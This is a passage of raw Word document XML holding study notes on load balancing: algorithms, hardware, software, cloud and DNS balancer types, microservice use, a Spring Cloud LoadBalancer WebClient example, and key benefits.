          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single point of access</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249062A5"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1DA2272E">
          <v:rect id="_x0000_i3124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52252B9B"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How Load Balancer Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706C713"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Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A10281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Client → Load Balancer → [Server1 | Server2 | Server3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE4AA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When a client sends a request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1C14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The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selects a healthy backend server based on a strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0A2D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 forwards the request and may also handle retries, SSL termination, or health checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E353C4D"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0C5E4C0">
          <v:rect id="_x0000_i3125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57100A"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ing Algorith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5877"/>
      </w:tblGrid>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="0E4C946F" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="560F4711"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Algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232645B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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="582320CE" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AE726D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ound Robin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C9C8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requests in sequence to each server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="19D0A9BA" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56AE67E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Least Connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BD447B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ends traffic to the server with the fewest current connections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="25F74885" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="750C017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IP Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68A1E5B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Uses client IP to always route to the same server (sticky session).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="4A165653" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA5ED6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Weighted Round Robin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A90A4F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Prefer some servers more (e.g., faster servers get more traffic).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="51C0FE7F" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55FA94E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Random</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="092E56B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s randomly among healthy servers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73F0366F"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2E5A02B">
          <v:rect id="_x0000_i3126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61653A88"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Types of Load Balanc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2"/>
        <w:gridCol w:w="3960"/>
        <w:gridCol w:w="944"/>
      </w:tblGrid>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="4E5D5098" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03835724"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60B2AA7C"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Example Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41434FE8"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Works At</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="1326DE2B" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CE9C4D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ardware Load Balancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F313BF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F5, Cisco, Citrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED6D7EF"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54CECE8E" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5525D24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oftware Load Balancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2701435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NGINX, HAProxy, Envoy, Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76812E0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33176627" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD6F08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Cloud Load Balancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CD66E2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AWS ELB/ALB, Azure Load Balancer, GCP LB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="494D3C8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4/7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068580F" w:rsidRPr="0068580F" w14:paraId="466BCECA" w14:textId="77777777" w:rsidTr="00BD0748">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23B6A39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DNS Load Balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30AF6F6A"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Route53, Cloudflare DNS, GCP Cloud DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="555203E2"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Layer 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30E9057C"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6E3E8CBA">
          <v:rect id="_x0000_i3127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7684215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Load Balancer in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEEDE7"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lastRenderedPageBreak/>
        <w:t>In a microservices setup, the load balancer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF989D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its in front of multiple instances of a service (e.g., 3 pods of user-service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032AC00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Can be internal (e.g., inside Kubernetes using </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kube-proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A166141"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Or external (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NGINX</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AWS ALB</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679DCCBC"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70A9A631">
          <v:rect id="_x0000_i3128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC43C23"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Spring Boot Example Using LoadBalancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243DD83"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pring Boot (via Spring Cloud) supports client-side load balancing using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095B96B"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pring Cloud LoadBalancer</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (modern replacement for Netflix Ribbon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6F4A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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED5018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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA93DF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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UserClien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73BBDC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p>
    <w:p w14:paraId="09068F7D"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB6D6C"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rivate</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Builder</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p>
    <w:p w14:paraId="4061BF3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1B245"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public</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getUser</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</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5350BC42"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> webClientBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B531CD9"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E869337"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uri</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://user-service/api/users/"</w:t>
      </w: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 xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// load-balanced name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA6B6A"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retrieve</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F879176"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r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bodyToMono</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE40813" w14:textId="77777777"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18327193" w14:textId="0B07DE9F" w:rsidR="005666C7" w:rsidRPr="005666C7" w:rsidRDefault="00566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203191"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="005666C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B98C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Here, user-service is resolved to one of its instances via Spring LoadBalancer and Eureka/Consul (if used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FCA40"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375991EC">
          <v:rect id="_x0000_i3129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3EE48C"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Key Benefits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD2ACE5"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High availability</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: if one instance fails, others handle the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FA574"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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: you can easily add more instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB524C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Better performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
